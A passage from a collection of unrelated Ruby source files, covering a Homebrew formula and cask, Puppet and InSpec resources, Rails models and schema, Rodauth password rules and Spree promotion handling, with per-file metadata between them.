        "Authorization" => "Bearer #{@auth_details[:access_token]}" }
    elsif @auth_details.has_key? :api_key
      if not options.has_key? :basic_auth
        options[:basic_auth] = {
          :username => @auth_details[:api_key], :password => 'x' }
      end
    end
    args[1] = options
  end
  args
end
# Maps an HTTParty response to a return value or a typed exception:
# 400 -> BadRequest; 401 -> InvalidOAuthToken / ExpiredOAuthToken /
# RevokedOAuthToken / Unauthorized depending on the API error Code
# (120 / 121 / 122); 404 -> NotFound; other 4xx -> ClientError;
# 5xx -> ServerError. Successful responses are returned unchanged.
def handle_response(response) # :nodoc:
  case response.code
  when 400
    raise BadRequest.new(Hashie::Mash.new response)
  when 401
    data = Hashie::Mash.new(response)
    case data.Code
    when 120
      raise InvalidOAuthToken.new data
    when 121
      raise ExpiredOAuthToken.new data
    when 122
      raise RevokedOAuthToken.new data
    else
      raise Unauthorized.new data
    end
  when 404
    raise NotFound.new
  when 400...500
    raise ClientError.new
  when 500...600
    raise ServerError.new
  else
    response
  end
end
end
end | 34.536332 | 103 | 0.65244 |
5d9e8ff45123e15f428808aef7b89b30e8c15824 | 2,005 | # -------------------------------------------------------------------------
# Copyright (c) 2020, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
# -------------------------------------------------------------------------
class Wso2amMicroGw320 < Formula
  desc "WSO2 API Micro Gateway 3.2.0"
  homepage "https://wso2.com/api-management/api-microgateway/"
  url "https://dl.bintray.com/wso2/binary/wso2am-micro-gw-3.2.0.zip"
  sha256 "2b1bdab62052c89c7673f92a0c722f0d507094c304aff9e9ee0a944e524f8d3e"
  bottle :unneeded

  # Prompt the user until they explicitly accept (Y) or reject (N) the
  # WSO2 EULA. Rejection aborts the installation. EOF on stdin (e.g. a
  # non-interactive install) previously crashed with NoMethodError on
  # nil.chomp; it is now treated as a rejection.
  def check_eula_acceptance()
    notread = true
    # NOTE(review): "β" below looks like a mis-encoded dash — confirm
    # against the upstream formula before changing the text.
    puts "\nIMPORTANT β READ CAREFULLY:"
    puts "PLEASE REFER THE SOFTWARE LICENSE [https://wso2.com/license/wso2-update/LICENSE.txt] CAREFULLY BEFORE COMPLETING THE INSTALLATION PROCESS AND USING THE SOFTWARE."
    while notread
      print "DO YOU AGREE WITH WSO2 SOFTWARE LICENSE AGREEMENT ? [Y/n]: "
      ans = STDIN.gets
      if ans.nil?
        # stdin closed — cannot obtain consent, so abort.
        puts "\nInstallation Aborted !"
        exit(0)
      end
      case ans.chomp
      when 'y', 'Y'
        notread = false
        puts "\nContinuing with the installation"
      when 'n', 'N'
        notread = false
        puts "\nInstallation Aborted !"
        exit(0)
      else
        # Typo fix: "agrees" -> "agree".
        puts "Please enter Y if you agree with EULA. Otherwise enter N"
      end
    end
  end

  def install
    product = "wso2am-micro-gw"
    version = "3.2.0"
    check_eula_acceptance()
    puts "Installing WSO2 API Micro Gateway #{version}..."
    bin.install "bin/gateway" => "#{product}-#{version}"
    libexec.install Dir["*"]
    bin.env_script_all_files(libexec/"bin", Language::Java.java_home_env("1.8"))
    puts "Installation is completed."
    puts "\nIMPORTANT: After WSO2 Micro Gateway #{version} is successfully installed, Instigate any improvements on top of a released WSO2 product by running In-Place Updates tool."
    puts "\nRun"
    puts "\n #{product}-#{version} <Path_to_Executable_Artifact>"
    puts "\nto start WSO2 Micro Gateway #{version}."
    puts "\ncheers!!"
  end
end
| 37.830189 | 181 | 0.616958 |
1d0a91ca7027f3b5489c39422d4e9157438b42a1 | 1,576 | Puppet::Type.newtype(:dism) do
@doc = 'Manages Windows features via dism.'
ensurable
newparam(:name, :namevar => true) do
desc 'The Windows feature name (case-sensitive).'
end
newparam(:answer) do
desc 'The answer file for installing the feature.'
end
newparam(:source) do
desc "The source files needed for installing the feature."
end
newparam(:limitaccess) do
desc "Prevent DISM from contacting Windows Update for repair of online images"
newvalues(:true, :false)
defaultto(false)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:all) do
desc 'A flag indicating if we should install all dependencies or not.'
newvalues(:true, :false)
defaultto(false)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:norestart) do
desc 'Whether to disable restart if the feature specifies it should be restarted'
newvalues(:true, :false)
defaultto(true)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:exitcode, :array_matching => :all) do
desc 'DISM installation process exit code'
# Ruby truncates exit codes to one bytes (https://bugs.ruby-lang.org/issues/8083)
# so use truncated codes as workaround.
#defaultto([0, 3010])
defaultto([0, 3010, 3010 & 0xFF])
end
def munge_boolean(value)
case value
when true, "true", :true
:true
when false, "false", :false
:false
else
fail("munge_boolean only takes booleans")
end
end
end
| 23.522388 | 85 | 0.663706 |
e96f336f846a795b108552b5f631dfa324c866ac | 178 | module EcwidApi
  # Entity mapped to the Ecwid "classes" (product type) API endpoint.
  # Exposes read access to id/attributes/name/googleTaxonomy and write
  # access to attributes/name via the ecwid_reader/ecwid_writer macros.
  class ProductType < Entity
    self.url_root = "classes"
    ecwid_reader :id, :attributes, :name, :googleTaxonomy
    ecwid_writer :attributes, :name
  end
end | 19.777778 | 57 | 0.724719 |
219b6b8a22cba56faf423e3ebcd01f3dd65eb745 | 1,793 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20160206143113) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
  # Join table linking students to the courses they are enrolled in.
  create_table "classrooms", force: true do |t|
    t.integer  "student_id"
    t.integer  "course_id"
    t.datetime "created_at"
    t.datetime "updated_at"
  end
  add_index "classrooms", ["course_id"], name: "index_classrooms_on_course_id", using: :btree
  add_index "classrooms", ["student_id"], name: "index_classrooms_on_student_id", using: :btree
  create_table "courses", force: true do |t|
    t.string   "name"
    t.text     "description"
    t.integer  "status"
    t.datetime "created_at"
    t.datetime "updated_at"
  end
  create_table "students", force: true do |t|
    t.string   "name"
    t.string   "register_number"
    t.integer  "status"
    t.datetime "created_at"
    t.datetime "updated_at"
  end
  # Foreign keys enforcing classroom referential integrity at the DB level.
  add_foreign_key "classrooms", "courses", name: "classrooms_course_id_fk"
  add_foreign_key "classrooms", "students", name: "classrooms_student_id_fk"
end
| 36.591837 | 95 | 0.740658 |
3803558128a003a7c09163614cb94385995c45a3 | 5,708 | #
# rm-macl/lib/rm-macl/xpan/grid/grid3.rb
# by IceDragon
require 'rm-macl/macl-core'
module MACL
  # Grid3 models a 3-D grid of equally sized cells (columns x rows x layers).
  # A configurable "cell order" selects which axis varies fastest when cells
  # are addressed by a single linear index (see xyz_to_index/index_to_xyz).
  class Grid3
    CELL_ORDER_COLS = 1
    CELL_ORDER_ROWS = 2
    CELL_ORDER_LAYS = 3
    # Class-level default copied into new instances (see ::default_cell_order).
    @default_cell_order = CELL_ORDER_LAYS
    attr_accessor :columns, :rows, :layers
    attr_accessor :cell_width, :cell_height, :cell_depth
    attr_reader :cell_order
    ##
    # ::valid_cell_order?(CELL_ORDER order)
    # True when +order+ is one of the three CELL_ORDER_* constants.
    def self.valid_cell_order?(order)
      order == CELL_ORDER_COLS ||
      order == CELL_ORDER_ROWS ||
      order == CELL_ORDER_LAYS
    end
    ##
    # ::validate_cell_order(CELL_ORDER order)
    # Raises ArgumentError for unknown cell orders.
    def self.validate_cell_order(order)
      unless valid_cell_order?(order)
        raise(ArgumentError, "Invalid Cell Order #{order}")
      end
    end
    ##
    # ::default_cell_order
    def self.default_cell_order
      return @default_cell_order
    end
    ##
    # ::default_cell_order=(CELL_ORDER new_order)
    def self.default_cell_order=(new_order)
      validate_cell_order(new_order)
      @default_cell_order = new_order
    end
##
# ::cell_cube(int cols, int rows, int cell_w, int cell_h, int index)
# ::cell_cube(int cols, int rows, int cell_w, int cell_h, int x, int y, int z)
def self.cell_cube(cols, rows, lays, cell_w, cell_h, cell_d, *args)
index = args.size == 1 ? args.first : xyz_to_index(*args)
new(cols, rows, lays, cell_w, cell_h, cell_d).cell_cube(index)
end
##
# initialize(int cols, int rows, int lays, int cell_w, int cell_h, int cell_d)
def initialize(*args)
set(*args)
@cell_order = self.class.default_cell_order
end
##
# set(int cols, int rows, int lays, int cell_w, int cell_h, int cell_d)
def set(cols, rows, lays, cell_w, cell_h, cell_d)
@columns = cols.to_i
@rows = rows.to_i
@layers = lays.to_i
@cell_width = cell_w.to_i
@cell_height = cell_h.to_i
@cell_depth = cell_d.to_i
self
end
##
# cell_order=(CELL_ORDER new_order) -> nil
def cell_order=(new_order)
self.class.validate_cell_order(new_order)
@cell_order = new_order
end
##
# width -> int
def width
columns * cell_width
end
##
# height -> int
def height
rows * cell_height
end
##
# depth -> int
def depth
layers * cell_depth
end
##
# cell_count -> int
def cell_count
rows * columns * layers
end
##
# volume -> int
def volume
width * height * depth
end
##
# index_to_xyz(int x, int y, int z) -> int
def xyz_to_index(x, y, z)
case @cell_order
when CELL_ORDER_COLS then (x % columns) +
(y * columns) +
(z * columns * rows)
when CELL_ORDER_ROWS then (x * rows * layers) +
(y % rows) +
(z * rows)
when CELL_ORDER_LAYS then (x * layers) +
(y * layers * columns) +
(z % layers)
end
end
##
# index_to_xy(int index) -> Array<int>[3]
def index_to_xyz(index)
case @cell_order
when CELL_ORDER_COLS then [(index) % columns,
(index / columns) % rows,
(index / (columns * rows)) % layers]
when CELL_ORDER_ROWS then [(index / (rows * layers)) % columns,
(index) % rows,
(index / rows) % layers]
when CELL_ORDER_LAYS then [(index / layers) % columns,
((index / (layers * columns)) % rows),
(index) % layers]
end
end
##
# cell_a(int index) |
# cell_a(int x, int y, int z) |-> Array<int>[6]
def cell_a(*args)
case args.size
when 1 then x, y, z = index_to_xyz(args[0])
when 3 then x, y, z = *args
else raise(ArgumentError, "Expected 1 or 3 but recieved #{args.size}")
end
[cell_width * x, cell_height * y, cell_depth * z,
cell_width, cell_height, cell_depth]
end
##
# cell_cube(int index) |
# cell_cube(int x, int y, int z) |-> MACL::Cube
def cell_cube(*args)
MACL::Cube.new(*cell_a(*args))
end
##
# col_cube(x, z) -> Cube
# Returns an Cube of the column (x, z)
def col_cube(x, z)
Cube.new(x * cell_width, 0 * cell_height, z * cell_depth,
cell_width, cell_height * rows, cell_depth)
end
##
# row_cube(y, z) -> Cube
# Returns an Cube of the row (y, z)
def row_cube(y, z)
Cube.new(0 * cell_width, y * cell_height, z * cell_depth,
cell_width * columns, cell_height, cell_depth)
end
##
# lay_cube(x, y) -> Cube
# Returns an Cube of the row (x, y)
def lay_cube(x, y)
Cube.new(x * cell_width, y * cell_height, 0 * cell_depth,
cell_width, cell_height, cell_depth * layers)
end
##
# col_ia(int x, int z) -> Array<int>
# Returns an Array of indecies for colummn (x, z)
def col_ia(x, z)
(0...rows).map { |y| xyz_to_index(x, y, z) }
end
##
# row_ia(int y, int z) -> Array<int>
# Returns an Array of indecies for row (y, z)
def row_ia(y, z)
(0...columns).map { |x| xyz_toindex(x, y, z) }
end
##
# lay_ia(int x, int y) -> Array<int>
# Returns an Array of indecies for row (x, y)
def row_ia(x, y)
(0...layers).map { |z| xyz_toindex(x, y, z) }
end
end
end
MACL.register('macl/xpan/grid/grid3', '1.1.0') | 27.180952 | 83 | 0.544849 |
eda6670c31358d3cc660ae9100ca61fa0de24e37 | 175 | RSpec.describe Tippy do
  it "has a version number" do
    expect(Tippy::VERSION).not_to be nil
  end
  # NOTE(review): gem-scaffold placeholder that always fails; replace it with
  # a real expectation (or remove it) before relying on this suite.
  it "does something useful" do
    expect(false).to eq(true)
  end
end
| 17.5 | 40 | 0.691429 |
ff7f884c0892d69f8080b249c3a697b2d2497416 | 146 | # frozen_string_literal: true
RSpec.configure do |config|
  config.mock_with :rspec do |mocks|
    # Raise when a partial double stubs a method the real object lacks.
    mocks.verify_partial_doubles = true
  end
end
| 18.25 | 39 | 0.760274 |
4a38134473c6d2b0cd93a24b89c1696c5b91d3e0 | 1,337 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'vagrant-qienv/version'
Gem::Specification.new do |spec|
  spec.name          = "vagrant-qienv"
  spec.version       = VagrantPlugins::Cienv::VERSION
  spec.authors       = ["Alfredo Matas"]
  spec.email         = ["[email protected]"]
  spec.summary       = %q{Vagrant CI environment builder}
  spec.description   = %q{Vagrant CI environment builder}
  spec.homepage      = "http://github.com/amatas/vagrant-qienv.git"
  spec.license       = "MIT"
  # Prevent pushing this gem to RubyGems.org by setting 'allowed_push_host', or
  # delete this section to allow pushing this gem to any host.
  # if spec.respond_to?(:metadata)
  #   spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
  # else
  #   raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
  # end
  # NOTE(review): `split($\)` relies on $\ being nil (falls back to whitespace
  # split); the conventional separator here is $/ — confirm before changing.
  spec.files         = `git ls-files`.split($\)
  spec.executables   = spec.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]
  spec.add_development_dependency "bundler", "~> 1.11"
  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency "method_source", "~> 0.8.2"
end
| 39.323529 | 85 | 0.673897 |
ac473d9ba655926e50f20f50239aabd18348ed09 | 74 | class <%= class_name %> < Less::Interaction
  # Generator template: `run` is the interaction entry point to be filled in
  # by the generated class.
  def run
  end
  private
end | 12.333333 | 43 | 0.662162 |
33fc1f76cd7e446aadcfd77aedef1fb8ef345b07 | 117 | require 'ecm/version'
module Ecm
  module Files
    module Backend
      # Gem version, mirrored from the top-level ::Ecm::VERSION constant.
      VERSION = ::Ecm::VERSION
    end
  end
end
| 11.7 | 30 | 0.649573 |
1acb9036a441a7d8e3f1e08597346dd1957a77a2 | 134 | class AddAdminToUsers < ActiveRecord::Migration[5.2]
  def change
    # New users are regular (non-admin) accounts unless flagged explicitly.
    add_column :users, :admin, :boolean, :default => false
  end
end
| 22.333333 | 57 | 0.723881 |
260c2386f743453515539a3e4bfb09d5e727eacb | 2,316 | class User < ActiveRecord::Base
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable, :omniauthable, :registerable, :recoverable, :validatable
  devise :database_authenticatable, :rememberable, :trackable
  belongs_to :data_center
  belongs_to :user_role
  after_initialize :generate_sid_if_necessary
  after_create :set_data_center_permission
  validates :username, uniqueness: { message: I18n.t('activerecord.errors.models.user.attributes.username.uniqueness') }
  validates :data_center, presence: { message: I18n.t('activerecord.errors.models.user.attributes.data_center.presence') }
  validates :password, confirmation: { message: I18n.t('activerecord.errors.models.user.attributes.password.confirmation') }
  validates :sid, presence: true
  validates :sid, uniqueness: true
  # sid is a "B" prefix plus 32 lowercase hex chars (see generate_sid_if_necessary).
  validates :sid, format: { with: /\AB[a-z0-9]{32}\z/ }
  # Stores a fresh API token in Redis as JSON {auth_token, expires_at},
  # keyed by redis_key ("user_<sid>").
  def api_sign_in
    $redis.set(self.redis_key, {
      auth_token: User.generate_random_hex_string,
      expires_at: User.generate_token_expires_at
    }.to_json)
  end
  # Removes the user's API token from Redis.
  def api_sign_out
    $redis.del(self.redis_key)
  end
  # Token lookup: returns the User when the stored token matches and has not
  # expired, otherwise nil.
  # NOTE(review): expires_at comes back from JSON.parse as a String; comparing
  # it to Time.zone.now with `>` likely raises — confirm and parse it first.
  def self.authenticate_from_token!(sid, auth_token)
    api_key = User.fetch_api_key_from_redis(sid)
    if api_key.present? && api_key.key?(:auth_token) && api_key.key?(:expires_at) && api_key[:auth_token] == auth_token && api_key[:expires_at] > Time.zone.now
      return User.find_by(sid: sid)
    end
    return nil
  end
  # Serializes the user plus the current auth_token pulled from Redis.
  def as_json(options = {})
    Jbuilder.new do |user|
      user.(self, :id, :data_center_id, :username, :locale, :sid, :user_role_id)
      user.auth_token User.fetch_api_key_from_redis(sid).try(:[], :auth_token)
    end.attributes!
  end
  protected
  def redis_key
    return "user_#{self.sid}"
  end
  private
  # Grants the user access to their home data center on creation.
  def set_data_center_permission
    DataCenterPermission.find_or_create_by(user: self, data_center: self.data_center)
  end
  # Assigns a random sid on first initialization; returns true so the
  # callback chain is never halted.
  def generate_sid_if_necessary
    self.sid ||= "B#{User.generate_random_hex_string}"
    return true
  end
  def self.fetch_api_key_from_redis(sid)
    api_key = $redis.get("user_#{sid}")
    return api_key.present? ? JSON.parse(api_key).try(:symbolize_keys) : nil
  end
  def self.generate_random_hex_string
    return SecureRandom.hex(16)
  end
  def self.generate_token_expires_at
    return 1.month.from_now
  end
end
| 30.077922 | 159 | 0.736615 |
1d5b8b237756b14438c82fe2c50b1ceabaa07983 | 1,795 | # frozen_string_literal: true
require 'aws_backend'
class AwsSecurityGroups < AwsResourceBase
  name 'aws_security_groups'
  desc 'Verifies settings for AWS Security Groups in bulk'
  example "
    # Verify that you have security groups defined
    describe aws_security_groups do
      it { should exist }
    end
    # Verify you have more than the default security group
    describe aws_security_groups do
      its('entries.count') { should be > 1 }
    end
  "
  attr_reader :table
  # FilterTable setup
  FilterTable.create
             .register_column(:tags, field: :tags)
             .register_column(:group_names, field: :group_name)
             .register_column(:vpc_ids, field: :vpc_id)
             .register_column(:group_ids, field: :group_id)
             .install_filter_methods_on_resource(self, :table)
  def initialize(opts = {})
    # Call the parent class constructor
    super(opts)
    validate_parameters([])
    @table = fetch_data
  end
  # Pages through describe_security_groups and flattens the results into
  # one row per security group for FilterTable.
  def fetch_data
    security_group_rows = []
    pagination_options = {}
    loop do
      catch_aws_errors do
        @api_response = @aws.compute_client.describe_security_groups(pagination_options)
      end
      # Bail out with an empty table when the API returned nothing.
      return [] if !@api_response || @api_response.empty?
      @api_response.security_groups.map do |security_group|
        security_group_rows += [{
          group_id: security_group.group_id,
          vpc_id: security_group.vpc_id,
          group_name: security_group.group_name,
          tags: map_tags(security_group.tags),
        }]
      end
      break unless @api_response.next_token
      pagination_options = { next_token: @api_response.next_token }
    end
    @table = security_group_rows
  end
end
| 29.916667 | 88 | 0.641226 |
abfff5adfb558fbd296ae533a8514b163a0d7bf7 | 1,009 | require 'formula'
class Luabind < Formula
  homepage 'http://www.rasterbar.com/products/luabind.html'
  url 'http://downloads.sourceforge.net/project/luabind/luabind/0.9.1/luabind-0.9.1.tar.gz'
  sha1 '2e92a18b8156d2e2948951d429cd3482e7347550'
  depends_on 'lua'
  depends_on 'boost'
  depends_on 'boost-build' => :build
  def patches
    [
      # patch Jamroot to perform lookup for shared objects with .dylib suffix
      "https://raw.github.com/gist/3728987/052251fcdc23602770f6c543be9b3e12f0cac50a/Jamroot.diff",
      # apply upstream commit to enable building with clang
      "https://github.com/luabind/luabind/commit/3044a9053ac50977684a75c4af42b2bddb853fad.diff"
    ]
  end
  # Build with boost-build (bjam), selecting a toolset that matches the
  # active Homebrew compiler.
  def install
    args = [
      "release",
      "install"
    ]
    if ENV.compiler == :clang
      args << "--toolset=clang"
    elsif ENV.compiler == :llvm
      args << "--toolset=llvm"
    elsif ENV.compiler == :gcc
      args << "--toolset=darwin"
    end
    args << "--prefix=#{prefix}"
    system "bjam", *args
  end
end
| 27.27027 | 96 | 0.682854 |
bf304d79bf63a40f849d730ea17843406065c5fa | 876 | FactoryBot.define do
  # Plain-Hash factory (class: Hash, not an ActiveRecord model). Builds the
  # search-result document shape with string keys (see initialize_with).
  factory :document_hash, class: Hash do
    sequence :title, 1 do |n|
      "document_title_#{n}"
    end
    sequence :link, 1 do |n|
      "path/to/document_#{n}"
    end
    content_id { SecureRandom.uuid }
    sequence :description, 1 do |n|
      "description_#{n}"
    end
    public_timestamp { Time.now }
    release_timestamp { Time.now }
    document_type { "answer" }
    organisations {
      [{
        "acronym" => "DWP",
        "content_id" => "b548a09f-8b35-4104-89f4-f1a40bf3136d",
        "title" => "Department for Work and Pensions",
      }]
    }
    content_purpose_supergroup { "guidance_and_regulation" }
    is_historic { false }
    government_name { "2015 Conservative government" }
    es_score { nil }
    format { "answer" }
    facet_values { [] }
    # Return a string-keyed Hash instead of instantiating a model object.
    initialize_with { attributes.deep_stringify_keys }
  end
end
| 26.545455 | 65 | 0.616438 |
ed77b970c768f6a5ab313a902176ba488e92015d | 1,068 | module Poser
  # Builds canned social-media style comments in three tones
  # (positive/negative/neutral), optionally personalized with a name.
  class Comment
def self.positive(name=nil)
if name
["#{name.capitalize}! Let's hang out some time.", "#{name.capitalize} is my favorite person on this platform.", "#{name.capitalize} is doing an amazing job."].sample
else
["I couldn't agree more.", "This is why I downloaded this app.", "Hilarious!", "So good to hear!"].sample
end
end
    # Return a random negative comment; personalized when +name+ is given.
    def self.negative(name=nil)
      if name
        ["#{name.capitalize}, Never hang out with me again.", "#{name.capitalize} is the worst person on this platform.", "#{name.capitalize} is doing a horrendous job."].sample
      else
        ["I cannot disagree more.", "You don't look good in this post", "Yikes"].sample
      end
    end
    # Return a random neutral comment; personalized when +name+ is given.
    def self.neutral(name=nil)
      if name
        ["#{name.capitalize}, I could go either way, to be honest.", "#{name.capitalize} is just ok.", "#{name.capitalize} is doing an average job."].sample
      else
        ["I guess.", "I'm really not certain.", "It doesn't really matter to me."].sample
      end
    end
  end
end
| 35.6 | 177 | 0.621723 |
bf831027c886e092c9c91cfa303e94983e62fdb8 | 739 | module Spree
  class File < Spree::Base
    belongs_to :line_item
    #has_attached_file :image, styles: { medium: "300x300>", thumb: "100x100>" }, default_url: "/images/:style/missing.png"
    has_attached_file :image, styles: { thumb: "100x77" , medium: "500x385"}
    #validates_attachment_content_type :image, content_type: /\Aimage\/.*\Z/
    # Accepts common image formats plus PDF uploads.
    validates_attachment_content_type :image, content_type: %w(image/jpeg image/jpg image/tiff image/png application/pdf)
    #validates_attachment :image, :content_type => {:content_type => %w(image/jpeg image/jpg image/tiff image/png application/pdf)}
    before_post_process :skip_for_pdf
    # Skip Paperclip post-processing (thumbnail generation) for PDF uploads;
    # returning false from a before_post_process callback halts processing.
    def skip_for_pdf
      ! %w(application/pdf).include?(image_content_type)
    end
  end
end | 41.055556 | 135 | 0.722598 |
e863d82e1b768a9571c16ee5e82794d299881e86 | 945 | cask "canon-ijscanner4" do
  # Version encodes "driver,revision"; before_comma/after_comma split it below.
  version "4.0.0a,19_2"
  sha256 "abf852e335ee47947becd99eddece2159fa293225096b083578a174ec1f08778"
  # gdlp01.c-wss.com/gds/ was verified as official when first introduced to the cask
  url "https://gdlp01.c-wss.com/gds/1/0100006581/02/misd-mac-ijscanner4-#{version.before_comma.dots_to_underscores.delete_suffix("a")}-ea#{version.after_comma}.dmg"
  name "Canon Scanner ICA Driver for CanoScan 9000F Mark II"
  homepage "https://www.usa.canon.com/internet/portal/us/home/support/details/scanners/film-negative-scanner/canoscan-9000f-mark-ii?tab=drivers_downloads&subtab=downloads-drivers"
  # Installer pkg name embeds the zero-padded version digits (e.g. 040000).
  pkg "Canon IJScanner4_#{format("%<major>02d%<minor>02d%<patch>02d", major: version.major, minor: version.minor, patch: version.patch.to_i)}.pkg"
  uninstall pkgutil: "jp.co.canon.pkg.canonijscanner4.#{format("%<major>02d%<minor>02d%<patch>02d", major: version.major, minor: version.minor, patch: version.patch.to_i)}"
end
| 67.5 | 179 | 0.77672 |
abf67189e2f0f31924c13b6c4aa1fa5ed9196dd6 | 5,477 | # frozen-string-literal: true
module Rodauth
  # Shared base feature: login/password validation rules (length, email
  # format, confirmation messages) plus password hashing/storage helpers.
  Feature.define(:login_password_requirements_base, :LoginPasswordRequirementsBase) do
    translatable_method :already_an_account_with_this_login_message, 'already an account with this login'
    auth_value_method :login_confirm_param, 'login-confirm'
    auth_value_method :login_email_regexp, /\A[^,;@ \r\n]+@[^,@; \r\n]+\.[^,@; \r\n]+\z/
    auth_value_method :login_minimum_length, 3
    auth_value_method :login_maximum_length, 255
    translatable_method :login_not_valid_email_message, 'not a valid email address'
    translatable_method :logins_do_not_match_message, 'logins do not match'
    auth_value_method :password_confirm_param, 'password-confirm'
    auth_value_method :password_minimum_length, 6
    translatable_method :passwords_do_not_match_message, 'passwords do not match'
    auth_value_method :require_email_address_logins?, true
    auth_value_method :require_login_confirmation?, true
    auth_value_method :require_password_confirmation?, true
    translatable_method :same_as_existing_password_message, "invalid password, same as current password"
    translatable_method :contains_null_byte_message, 'contains null byte'
    auth_value_methods(
      :login_confirm_label,
      :login_does_not_meet_requirements_message,
      :login_too_long_message,
      :login_too_short_message,
      :password_confirm_label,
      :password_does_not_meet_requirements_message,
      :password_hash_cost,
      :password_too_short_message
    )
    auth_methods(
      :login_meets_requirements?,
      :login_valid_email?,
      :password_hash,
      :password_meets_requirements?,
      :set_password
    )
    def login_confirm_label
      "Confirm #{login_label}"
    end
    def password_confirm_label
      "Confirm #{password_label}"
    end
    # A login must satisfy both the length limits and (by default) look like
    # an email address.
    def login_meets_requirements?(login)
      login_meets_length_requirements?(login) && \
        login_meets_email_requirements?(login)
    end
    # A password must satisfy the minimum length and contain no NUL bytes.
    def password_meets_requirements?(password)
      password_meets_length_requirements?(password) && \
        password_does_not_contain_null_byte?(password)
    end
    # Hashes +password+ and persists it either in the accounts table column
    # or in the separate password hash table, inserting a row if missing.
    def set_password(password)
      hash = password_hash(password)
      if account_password_hash_column
        update_account(account_password_hash_column=>hash)
      elsif password_hash_ds.update(password_hash_column=>hash) == 0
        # This shouldn't raise a uniqueness error, as the update should only fail for a new user,
        # and an existing user should always have a valid password hash row. If this does
        # fail, retrying it will cause problems, it will override a concurrently running update
        # with potentially a different password.
        db[password_hash_table].insert(password_hash_id_column=>account_id, password_hash_column=>hash)
      end
      hash
    end
    private
    attr_reader :login_requirement_message
    attr_reader :password_requirement_message
    def password_does_not_meet_requirements_message
      "invalid password, does not meet requirements#{" (#{password_requirement_message})" if password_requirement_message}"
    end
    def password_too_short_message
      "minimum #{password_minimum_length} characters"
    end
    def set_password_requirement_error_message(reason, message)
      set_error_reason(reason)
      @password_requirement_message = message
    end
    def login_does_not_meet_requirements_message
      "invalid login#{", #{login_requirement_message}" if login_requirement_message}"
    end
    def login_too_long_message
      "maximum #{login_maximum_length} characters"
    end
    def login_too_short_message
      "minimum #{login_minimum_length} characters"
    end
    def set_login_requirement_error_message(reason, message)
      set_error_reason(reason)
      @login_requirement_message = message
    end
    def login_meets_length_requirements?(login)
      if login_minimum_length > login.length
        set_login_requirement_error_message(:login_too_short, login_too_short_message)
        false
      elsif login_maximum_length < login.length
        set_login_requirement_error_message(:login_too_long, login_too_long_message)
        false
      else
        true
      end
    end
    def login_meets_email_requirements?(login)
      return true unless require_email_address_logins?
      return true if login_valid_email?(login)
      set_login_requirement_error_message(:login_not_valid_email, login_not_valid_email_message)
      return false
    end
    # Truthy (match index) when the login matches the email regexp.
    def login_valid_email?(login)
      login =~ login_email_regexp
    end
    def password_meets_length_requirements?(password)
      return true if password_minimum_length <= password.length
      set_password_requirement_error_message(:password_too_short, password_too_short_message)
      false
    end
    def password_does_not_contain_null_byte?(password)
      return true unless password.include?("\0")
      set_password_requirement_error_message(:password_contains_null_byte, contains_null_byte_message)
      false
    end
    # Cheap bcrypt cost in tests; default cost otherwise.
    if ENV['RACK_ENV'] == 'test'
      def password_hash_cost
        BCrypt::Engine::MIN_COST
      end
    else
      # :nocov:
      def password_hash_cost
        BCrypt::Engine::DEFAULT_COST
      end
      # :nocov:
    end
    # bcrypt hashes embed the cost as two digits at offset 4 (e.g. "$2a$12$...").
    def extract_password_hash_cost(hash)
      hash[4, 2].to_i
    end
    def password_hash(password)
      BCrypt::Password.create(password, :cost=>password_hash_cost)
    end
  end
end
| 33.601227 | 123 | 0.738908 |
bfc8a4a524f0af99bd5ee24226a69d31057ada81 | 309 | module Fog
  module KeyManager
    class TeleFonica
      class Real
        # Issues DELETE containers/:id against the key-manager API and
        # expects HTTP 204 (no content) on success.
        def delete_container(id)
          request(
            :expects => [204],
            :method => 'DELETE',
            :path => "containers/#{id}"
          )
        end
      end
      # Mock implementation intentionally left empty.
      class Mock
      end
    end
  end
end
| 16.263158 | 42 | 0.459547 |
bb5bd6a061f379d45697c086d0836099d2c196fa | 2,082 | module Spree
  module PromotionHandler
    # Decides which promotion should be activated given the current order context
    #
    # By activated it doesn't necessarily mean that the order will have a
    # discount for every activated promotion. It means that the discount will be
    # created and might eventually become eligible. The intention here is to
    # reduce overhead. e.g. a promotion that requires item A to be eligible
    # shouldn't be eligible unless item A is added to the order.
    #
    # It can be used as a wrapper for custom handlers as well. Different
    # applications might have completely different requirements to make
    # the promotions system accurate and performant. Here they can plug custom
    # handler to activate promos as they wish once an item is added to cart
    class Cart
      attr_reader :line_item, :order
      attr_accessor :error, :success
      def initialize(order, line_item=nil)
        @order, @line_item = order, line_item
      end
      # Activates every candidate promotion that is eligible for the order
      # (or for the specific line item when one was given).
      def activate
        promotions.each do |promotion|
          if (line_item && promotion.eligible?(line_item, promotion_code: promotion_code(promotion))) || promotion.eligible?(order, promotion_code: promotion_code(promotion))
            promotion.activate(line_item: line_item, order: order, promotion_code: promotion_code(promotion))
          end
        end
      end
      private
      # Candidate set: promotions already connected to the order plus
      # automatically-applied ("sale") promotions.
      def promotions
        connected_order_promotions | sale_promotions
      end
      def connected_order_promotions
        Promotion.active.includes(:promotion_rules).
          joins(:order_promotions).
          where(spree_orders_promotions: { order_id: order.id }).readonly(false).to_a
      end
      def sale_promotions
        Promotion.where(apply_automatically: true).active.includes(:promotion_rules)
      end
      # The code that linked this promotion to the order, if any.
      def promotion_code(promotion)
